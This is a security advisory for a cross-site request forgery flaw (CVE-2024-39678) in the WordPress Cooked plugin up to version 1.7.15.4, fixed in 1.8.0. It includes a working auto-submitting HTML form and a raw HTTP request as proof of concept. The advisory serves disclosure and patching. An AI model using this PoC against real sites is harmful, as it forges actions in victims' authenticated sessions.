
WordPress Cooked Plugin <= 1.7.15.4 - Cross-Site Request Forgery to Get Recipe IDs

Moderate
XjSv published GHSA-pp3h-ghxf-r9pc Jul 17, 2024

Package

No package listed

Affected versions

<= 1.7.15.4

Patched versions

1.8.0

Description

Description:

The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.

Steps to reproduce:

<html>
	<!-- CSRF PoC - Get Recipe IDs -->
	<body>
		<form action="https://target.tld/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="cooked&#95;get&#95;recipe&#95;ids" />
			<input type="submit" value="Submit request" />
		</form>
		<script>
			history.pushState('', '', '/');
			document.forms[0].submit();
		</script>
	</body>
</html>

PoC request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.tld
Cookie: [cookies]
Content-Length: 28
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0

action=cooked_get_recipe_ids

Severity

Moderate 4.3 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE ID

CVE-2024-39678
